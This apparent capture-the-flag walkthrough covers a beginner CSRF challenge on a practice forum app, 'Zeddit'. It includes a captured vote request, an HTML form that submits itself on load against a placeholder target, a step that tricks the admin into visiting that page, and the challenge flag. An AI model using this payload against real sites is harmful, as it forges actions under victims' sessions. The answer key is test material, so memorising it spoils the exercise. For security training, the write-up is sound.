HACKR.GG
hackr.gg — Zeddit Vote Button Walkthrough
Save as PDF ↓
hackr.gg
— Official Walkthrough
Confidential · Educational Use Only
Zeddit Vote Button
CSRF · Cross-Site Request Forgery (CSRF)
Difficulty
Beginner
Vuln class
Cross-Site Request Forgery (CSRF)
Steps
3
// Objective
Craft an auto-submitting form that causes the victim to cast a vote on your behalf.
// Tools required
Browser
HTML editor
// Step-by-step walkthrough
1
Intercept a legitimate vote request
Log in as the victim user and upvote a post. Intercept the request in Burp or DevTools — note the method, endpoint, and body parameters.
Command / Input
POST /api/posts/42/vote {"direction":"up"}
2
Build the CSRF payload
Craft an HTML page that auto-submits the vote request when loaded. No token is required by the server — any origin can trigger it.
Command / Input
<form method="POST" action="http://TARGET/api/posts/42/vote"> <input name="direction" value="up"> </form> <script>document.forms[0].submit()</script>
3
Deliver the payload
Use the "Submit external link" feature on Zeddit to get the admin to visit your page. When they load it, the vote fires with their credentials.
Output
HackrGG{z3dd1t_v0t3_csrf_m0d_4ct10n}
// Flag
Flag value
HackrGG{z3dd1t_v0t3_csrf_m0d_4ct10n}
Revealed after a successful cross-site vote action on behalf of the admin.
